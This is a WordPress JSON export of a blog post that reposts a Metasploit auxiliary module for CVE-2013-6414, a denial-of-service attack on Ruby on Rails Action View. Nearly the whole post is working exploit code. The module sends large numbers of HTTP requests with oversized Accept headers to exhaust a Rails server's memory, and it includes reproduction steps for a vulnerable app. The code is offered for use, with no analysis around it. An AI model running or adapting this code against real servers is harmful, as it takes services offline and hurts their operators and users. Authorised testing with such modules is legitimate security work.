{"id":59279,"date":"2024-08-31T21:19:59","date_gmt":"2024-08-31T18:19:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180516\/rails_action_view.rb.txt"},"modified":"2024-08-31T21:19:59","modified_gmt":"2024-08-31T18:19:59","slug":"ruby-on-rails-action-view-mime-memory-exhaustion","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ruby-on-rails-action-view-mime-memory-exhaustion\/","title":{"rendered":"Ruby on Rails Action View MIME Memory Exhaustion"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Ruby on Rails Action View MIME Memory Exhaustion’,
‘Description’ => %q{
This module exploits a Denial of Service (DoS) condition in Action View that requires
a controller action. By sending a specially crafted content-type header to a Rails
application, it is possible for it to store the invalid MIME type, and may eventually
consume all memory if enough invalid MIMEs are given.<\/p>\n

Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
},
‘Author’ =>
[
‘Toby Hsieh’, # Reported the issue
‘joev’, # Metasploit
‘sinn3r’ # Metasploit
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘CVE’, ‘2013-6414’ ],
[ ‘OSVDB’, ‘100525’ ],
[ ‘BID’, ‘64074’ ],
[ ‘URL’, ‘https:\/\/seclists.org\/oss-sec\/2013\/q4\/400’ ],
[ ‘URL’, ‘https:\/\/github.com\/rails\/rails\/commit\/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068’ ]],
‘DisclosureDate’ => ‘2013-12-04’))<\/p>\n

register_options(
[
Opt::RPORT(80),
OptString.new(‘URIPATH’, [true, ‘The URI that routes to a Rails controller action’, ‘\/’]),
OptInt.new(‘MAXSTRINGSIZE’, [true, ‘Max string size’, 60000]),
OptInt.new(‘REQCOUNT’, [true, ‘Number of HTTP requests to pipeline per connection’, 1]),
OptInt.new(‘RLIMIT’, [true, ‘Number of requests to send’, 100000])
],
self.class)
end<\/p>\n

def host
host = datastore[‘RHOST’]host += “:” + datastore[‘RPORT’].to_s if datastore[‘RPORT’] != 80
host
end<\/p>\n

def long_string
Rex::Text.rand_text_alphanumeric(datastore[‘MAXSTRINGSIZE’])
end<\/p>\n

#
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(*strs)
new_str = strs * “\/”<\/p>\n

new_str = new_str.gsub!(“\/\/”, “\/”) while new_str.index(“\/\/”)<\/p>\n

# Makes sure there’s a starting slash
unless new_str.start_with?(“\/”)
new_str = ‘\/’ + new_str
end<\/p>\n

new_str
end<\/p>\n

def http_request
uri = normalize_uri(datastore[‘URIPATH’])<\/p>\n

http = ”
http << “GET #{uri} HTTP\/1.1\\r\\n”
http << “Host: #{host}\\r\\n”
http << “Accept: #{long_string}\\r\\n”
http << “\\r\\n”<\/p>\n

http
end<\/p>\n

def run
begin
print_status(“Stressing the target memory, this will take quite some time…”)
datastore[‘RLIMIT’].times { |i|
connect
datastore[‘REQCOUNT’].times { sock.put(http_request) }
disconnect
}<\/p>\n

print_status(“Attack finished. Either the server isn’t vulnerable, or please dos harder.”)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status(“Unable to connect to #{host}.”)
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good(“DoS successful. #{host} not responding. Out Of Memory condition probably reached.”)
ensure
disconnect
end
end
end<\/p>\n

=begin<\/p>\n

Reproduce:<\/p>\n

1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app\/views\/application\/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit \/application<\/p>\n

=end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::Tcpinclude Msf::Auxiliary::Dos def initialize(info = {})super(update_info(info,‘Name’ => ‘Ruby on Rails Action View MIME Memory Exhaustion’,‘Description’ => %q{This module exploits a Denial of Service (DoS) condition in Action View that requiresa controller action. By sending a specially crafted content-type header to a Railsapplication, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59279","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59279","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59279"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59279\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59279"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59279"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59279"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}